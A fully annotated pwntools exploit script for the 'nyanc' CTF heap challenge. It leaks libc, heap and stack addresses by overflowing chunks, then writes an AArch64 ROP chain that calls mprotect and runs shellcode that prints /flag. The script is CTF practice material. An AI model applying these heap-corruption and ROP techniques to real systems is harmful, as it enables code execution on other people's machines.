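#!/usr/bin/env python2
# encoding: utf-8
"""Exploit script for the "nyanc" heap challenge (pwntools, Python 2).

Command-line switches (any position in argv):
  remote -> talk to the CTF server instead of a local ./nyanc process
  debug  -> pwntools debug-level logging (dumps every byte sent/received)
  gdb    -> attach gdb in debug() with breakpoints on hard-coded offsets
"""
import ctypes
import os
import sys
from time import sleep

from pwn import *

# Local process unless "remote" is explicitly requested.
LOCAL = "remote" not in sys.argv
BINARY = "nyanc"
elf = ELF(BINARY)
context.log_level = "debug" if "debug" in sys.argv else "info"
# gdb.attach() opens its window as a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h', '-l', '150']
# Arch/OS/bits for asm()/shellcraft come from the target ELF header.
context.update(binary=elf)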
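def debug():
    """Attach gdb to the running target when "gdb" was passed on argv.

    Breakpoints go on three PIE-relative offsets the author annotated as
    ``ret`` instructions; the PIE base is read from the live process's
    mapping of its own executable.  Blocks on raw_input() so gdb has
    time to attach before the exploit sends its next payload.  Does
    nothing (and touches no globals) when "gdb" is not on argv.
    """
    if "gdb" not in sys.argv:
        return
    # Base of the PIE binary in the live process; would be 0 for a
    # non-PIE build of the target.
    pie_base = r.libs()[os.path.realpath(r.executable)]
    breakpoints = (
        pie_base + 0xb98,  # ret
        pie_base + 0xb28,  # ret
        pie_base + 0xc38,  # ret
    )
    script = "\n" + "".join("b *%#x\n" % bp for bp in breakpoints) + "c\n"
    # Attach to the tube's own pid rather than to the binary *name*:
    # pwntools resolves a string target through pidof(), which is
    # ambiguous if a stale or second nyanc process is around.
    gdb.attach(r, script)
    raw_input('attach')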
# One tube for the whole run: a local ./nyanc under pwntools, or the CTF
# server when "remote" was given on the command line.
r = process(BINARY) if LOCAL else remote("34.245.41.40", 1337)
def add(len, data):
    """Menu option 1: allocate a chunk of `len` bytes and fill it with `data`.

    `len` is sent verbatim via str(); the data prompt is only answered
    for a positive length.  Note: `len` shadows the builtin (name kept
    for call compatibility), and the comparison below is the reason the
    script can pass a *string* such as "-137616" as the length -- under
    Python 2 any str orders above any int, so the guard is not taken and
    the raw text reaches the target.  Under Python 3 this would raise
    TypeError instead.
    """
    r.sendlineafter(" > ", "1")
    r.sendlineafter("len : ", str(len))
    # Nothing more is sent for a non-positive length (the script does not
    # wait for a "data : " prompt in that case).
    if len > 0:
        r.sendafter("data : ", data)
def view(idx):
    """Menu option 2: dump chunk `idx` and return the raw reply.

    Returns everything read up to and including the "======" separator;
    callers slice out the bytes after "data: " themselves.
    """
    for prompt, answer in ((" > ", "2"), ("index : ", str(idx))):
        r.sendlineafter(prompt, answer)
    reply = r.readuntil("======")
    return reply
def edit(idx, data):
    """Menu option 3: overwrite chunk `idx` with `data`.

    `data` is sent with sendafter (no trailing newline), so the bytes
    arrive exactly as given; the script relies on this to push a payload
    longer than the chunk's allocation.
    """
    answers = ((" > ", "3"), ("index : ", str(idx)))
    for prompt, reply in answers:
        r.sendlineafter(prompt, reply)
    r.sendafter("data : ", data)
def free(idx):
    """Menu option 4: release chunk `idx`.  Returns nothing."""
    choice, index = "4", str(idx)
    r.sendlineafter(" > ", choice)
    r.sendlineafter("index : ", index)
# --- Stage 1: libc leak ----------------------------------------------------
# Chunk 0: a 0x450-48 byte allocation holding a short marker pattern.
add(0x450-(16+32), "a"*24)
# Chunk 1: zero-length allocation (add() sends no data for len <= 0).
add(0, "b")
align = 0x960
# 64 bytes are pushed into the 0-byte chunk 1 -- well past its allocation
# if the target copies them.  p64(align+1) = 0x961 sits at offset 24;
# presumably that is the size field of the following chunk, i.e. size
# 0x960 with PREV_INUSE set -- TODO confirm against the target's layout.
edit(1,"\x00"*24+p64(align+1)+"\x00"*32)
# A large allocation, then another 0-byte chunk (index 3) whose contents
# are read back: the script treats the first qword as a libc pointer.
add(4096, "c")
add(0, "d")
libc_leak = view(3).split("data: ")[1].split("======")[0]
# 0x154010 is the distance from the leaked pointer to the libc base and is
# specific to the libc build shipped with this challenge.
libc_leak = u64(libc_leak.ljust(8,"\x00")) - 0x154010
log.success("libc base @ " + hex(libc_leak))
# --- Stage 2: heap leak ----------------------------------------------------
# Chunks 4 and 5; chunk 5 is 0 bytes again so edit(5, ...) writes past it.
add(align-0x40-0x10, "eeee")
add(0, "f")
# Same offset-24 overwrite as stage 1, this time with all-ones
# (0xffffffffffffffff) in the presumed size field.
edit(5,"\x00"*24+"\xff"*8+"\x00"*32)
# The length is deliberately a *string*: under Python 2 any str compares
# greater than any int, so add()'s `len <= 0` guard is not taken and the
# negative text "-137616" reaches the target's length prompt verbatim
# (this line would raise TypeError under Python 3).
add("-137616","g")
add(0,"h")
# Chunk 7 is read back; the script derives what it calls the current heap
# pointer from the first qword, minus a fixed 48-byte adjustment.
heap_leak = view(7).split("data: ")[1].split("======")[0]
heap_leak = u64(heap_leak.ljust(8,"\x00")) - 48
log.success("current heap ptr @ " + hex(heap_leak))
# --- Stage 3: stack leak through a libc variable -----------------------------
# Overwrite past chunk 7 again: all-ones at offset 24, then a long zero tail.
edit(7,"\x00"*24+"\xff"*8+"\x00"*0x200)
# Offset from the libc base of the variable the script reads the stack
# pointer from (the author calls it "argv"; presumably __libc_argv --
# verify against the target libc's symbol table).
libc_argv = 0x157dc0
# Distance from the current heap pointer up to that libc variable.
offset = libc_leak - heap_leak + libc_argv
# Release the first four chunks before the oversized allocation below.
free(0)
free(1)
free(2)
free(3)
# An allocation sized so that the *next* 0-byte chunk lands on the libc
# variable; the -32-96 fudge is tied to the target's chunk header size and
# bookkeeping and is not derivable from this script alone.  The new chunks
# evidently reuse indices 0 and 1, since index 1 is what gets viewed.
add(offset-32-96, "0")
add(0,"1")
stack_leak = view(1).split("data: ")[1].split("======")[0]
# Fewer than 8 bytes back means the read did not land on the pointer; stop
# rather than turn junk into an address.
# NOTE(review): the value is taken from the *second* qword below, so this
# check would need to be `< 16` to guarantee a full pointer; 8..15 bytes
# pass here but produce a zero-padded, wrong address.
if len(stack_leak) < 8:
    log.fail("no leak :-(")
    exit(-1)
# The pointer of interest is the second qword of the read-back data.
stack_leak = u64(stack_leak[8:].ljust(8,"\x00"))
log.success("argv ptr @ " + hex(stack_leak))
# Distance from the libc variable to the stack slot the ROP chain will be
# written over.  The subtracted constants are the author's measured deltas
# for this target (frame layout, chunk accounting) and must be re-measured
# if the binary or libc changes.
offset = stack_leak - (libc_leak + libc_argv) - 328 - 48 - 16 - 8 - 64
# --- Stage 4: shellcode on the heap + ROP chain on the stack -------------------
# Payload: print /flag and exit cleanly; shellcraft emits code for the arch
# taken from the target ELF (context.update(binary=elf) above).
shellcode = shellcraft.cat('/flag') + shellcraft.exit(0)
# Same payload with an int3/brk in front, for stepping through it in gdb.
#shellcode = shellcraft.breakpoint() + shellcraft.cat('/flag') + shellcraft.exit(0)
# Chunk 7 now holds, in order: 7, 0x4007, the page-aligned heap address,
# then the shellcode.  The three qwords are what the gadgets below read as
# mprotect's arguments (see the loadx1x2 / loadx0 notes).
edit(7, p64(7) + p64(0x4007) + p64(heap_leak & 0xfffffffffffff000) + asm(shellcode))
# Walk the allocator up to the stack slot computed in stage 3.
add(offset,"k")
# Optional gdb attach (only with "gdb" on argv) before the final write.
debug()
# Address the chain returns into: 0x68 past the heap pointer, which is
# 3 qwords (0x18) into chunk 7's data if that data starts at +0x50 --
# consistent with the x19-relative loads below; TODO confirm in gdb.
shellcode_addr = p64(heap_leak + 0x68)
# Dynamic loader base, at a fixed distance from libc in this target.
ld = libc_leak + 0x159000
# AArch64 gadgets (author's disassembly kept on each line).  loadx1x2 reads
# x2 = [x19+0x58], x1 = [x19+0x60] and then x1 -= x2; with x19+0x58 aimed
# at the 7 / 0x4007 pair in chunk 7 that gives x2 = 7, x1 = 0x4000.  loadx0
# reads x0 = [x29+0x68].  The intended call is therefore
# mprotect(heap_page, 0x4000, PROT_RWX) followed by a return into the
# shellcode; which qwords of the chain end up in x19 and x29 depends on the
# victim's epilogue and is not visible here -- verify before re-tuning.
loadx1x2 = p64(libc_leak + 0xf7b74) # ldp x2, x1, [x19, #0x58] ; sub x1, x1, x2 ; sub w0, w0, w1 ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
loadx0 = p64(ld + 0x103e4) # : ldr x0, [x29, #0x68] ; ldp x29, x30, [sp], #0x70 ; ret
mprotect = p64(libc_leak + 0x72DF4 )
# Letter runs are filler for the callee-saved pops and frame slots each
# gadget consumes (13 qwords between mprotect and the shellcode address,
# 24 after it); the heap_leak-0x8 / heap_leak-0x80 entries are the values
# meant for x19 / x29.
ropchain = "aaaaaaaabbbbbbbbcccccccc" + loadx1x2 + p64(heap_leak - 0x8) + "ffffffffgggggggghhhhhhhh" + p64(heap_leak - 0x8) + loadx0 + p64(heap_leak - 0x80)*3 + mprotect + "ooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzzAAAAAAAA" + shellcode_addr + "CCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZ"
# The chain is written through a fresh allocation that now sits on the
# stack; 500 is an upper bound, the chain itself is shorter.
add(500, ropchain)
log.info('Getting shell...')
# Not needed: the shellcode already cats /flag on its own.
#r.sendline("cat flag*;")
r.interactive()
r.close()